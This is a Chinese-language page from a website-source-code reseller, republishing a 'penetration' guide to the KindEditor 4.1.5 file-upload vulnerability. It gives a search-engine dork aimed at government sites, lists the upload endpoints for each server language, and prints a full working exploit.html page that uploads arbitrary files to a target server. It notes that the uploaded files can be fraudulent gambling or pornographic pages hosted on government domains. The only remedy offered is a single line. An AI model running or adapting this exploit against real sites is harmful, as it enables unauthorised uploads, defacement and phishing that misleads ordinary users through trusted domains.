最新公告
  • 欢迎您光临牛品源码,本站秉承服务宗旨 履行“站长”责任,销售只是起点 服务永无止境!立即加入我们
    • 10年
    专业为站长提供优质资源
    升级SVIP
    站长交易平台

    网站渗透富文本编辑器 kindeditor4.1.5 文件上传漏洞_蜘蛛技巧_超级蜘蛛池

    2020-06-28 搜索优化 17 已收录
    当前位置:牛品源码 > 站长资讯 > 搜索优化 > 网站渗透富文本编辑器 kindeditor4.1.5 文件上传漏洞_蜘蛛技巧_超级蜘蛛池
    正文概述

    22.jpg

    漏洞等级:高危

    Kindeditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。

    11.jpg

    漏洞描述:

    Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件。支持

    Java、.NET、PHP、ASP等程序。

    漏洞利用:

    通过搜索引擎找到目标,比如:搜索关键字 inurl:gov.cn/kindeditor

    通过访问http://www.xx.gov.cn/kindeditor/kindeditor.js,查看kindeditor版本是否含有漏洞(<=4.1.5)

    获得网站使用的开发语言,并确定kindeditor上传文件地址,各种语言上传地址如下:

    • /asp/upload_json.asp

    • /asp.net/upload_json.ashx

    • /jsp/upload_json.jsp

    • /php/upload_json.php

    创建exploit.html页面,编辑内容如下:

    <html>
<head>
<title>kindeditor exploit</title>
<script src="http://www.xx.gov.cn/kindeditor/kindeditor.js"></script>
<script>
KindEditor.ready(function(K) {
	var uploadbutton = K.uploadbutton({
		button : K('#uploadButton')[0],
		fieldName : 'imgFile',
		url : 'http://www.xx.gov.cn/kindeditor/asp.net/upload_json.ashx?dir=file',
		afterUpload : function(data) {
			if (data.error === 0) {
				var url = K.formatUrl(data.url, 'absolute');
				K('#url').val(url);
			}
		},
	});
	uploadbutton.fileBox.change(function(e) {
		uploadbutton.submit();
	});
});
</script>
</head>
<body>
<div class="upload">
	<input type="button" id="uploadButton" value="Upload" />
</div>
</body>
</html>

    浏览器访问页面效果如下:

    1.png

    选择文件test.txt文件(文件内容:test…2019/03/04),网站审核元素,查看返回结果,如图:

    2.png

    访问网址结果如下:

    3.png

    漏洞影响:

    由于该漏洞无法上传php,asp,java等类型文件,所以无法getshell,但是可以上传包含色情、赌博等类欺骗性html网页,如果上传到政府类网站,不法分子会利用政府域名的权威性达到欺骗普通用户的目的,所以危害性很大。

    解决办法:

     限制上传文件类型

    普通

    分享到:

    相关推荐

    发表评论

    售后服务:

    • 售后服务范围 1、商业模板使用范围内问题免费咨询
      2、源码安装、模板安装(一般 ¥50-500)服务答疑仅限SVIP用户
      3、单价超过200元的模板免费一次安装,需提供服务器信息。
      付费增值服务 1、提供dedecms模板、WordPress主题、discuz模板优化等服务请详询在线客服
      2、承接 WordPress、DedeCMS、Discuz 等系统建站、仿站、开发、定制等服务
      3、服务器环境配置(一般 ¥50-500)
      4、网站中毒处理(需额外付费,1000元/次/质保三个月)
      售后服务时间 周一至周日(法定节假日除外) 9:00-23:00
      免责声明 本站所提供的模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: niupinyuanma@foxmail.com),我们会及时删除,给您带来的不便,我们深表歉意!